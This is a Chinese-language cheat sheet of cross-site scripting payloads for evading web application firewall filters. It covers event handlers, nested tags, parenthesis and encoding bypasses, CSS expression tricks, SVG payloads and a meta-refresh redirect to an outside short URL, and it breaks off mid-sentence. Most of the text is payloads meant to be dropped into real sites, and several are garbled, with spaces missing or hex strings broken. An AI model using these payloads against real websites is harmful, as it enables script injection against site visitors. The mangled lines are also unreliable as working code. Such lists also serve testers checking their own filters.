事件处理

 

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<bodyonload=prompt(1);>
<selectautofocusonfocus=alert(1)>
<textareaautofocusonfocus=alert(1)>
<keygenautofocusonfocus=alert(1)>
<video><sourceonerror="javascript:alert(1)">
短payload
<q/oncut=open()>
<q/oncut=alert(1)>//Usefulin-caseofpayloadrestrictions.

  嵌套欺骗
  <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
  <body  language=vbsonload=alert-1 // Works with IE8
  <command onmouseover="x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx63x6Fx6Ex66x6    9x72x6Dx26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B">Save</command>      // Works with IE8
  圆括号被过滤

 

<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw&#039;=alertx281x29&#039;;
Expression 属性
<img style="xss:expression(alert(0))"> // Works upto IE7.
<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>      // Works upto IE7.
<style>#test{x:expression(alert(/XSS/))}</style>      // Works upto IE7
“location”属性
<a onmouseover=location=’javascript:alert(1)>click
<body onfocus="location=&#039;javascrpt:alert(1) >123

  其他Payload

 

<meta http-equiv="refresh"      content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh"      content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g      onload="javascript:u0061lert(1);"></g></svg> //      By @secalert
<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href"      values=";javascript:alert(1)" begin="0s"      dur="0.1s" fill="freeze"/> // By Mario
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg>      // By @secalert
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed
();:被过滤
<svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41

  Opera的变量
  <svg><script>alert&#40      1&#41 // Works with Opera Only
  实体解码
  &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
  <a  href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>
  编码
  JavaScript是很灵活的语言,可以使用十六进制、Unicode、HTML等进行编码,以下属性可以被编码(支持HTML, Octal, Decimal,Hexadecimal, and Unicode)

 

href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
data= //只支持base64

  基于上下文的过滤
  WAF大的问题是不能理解内容,使用黑名单可以阻挡独立的js脚本,但仍不能对xss提供足够的保护,如果一个反射型的XSS是下面这种形式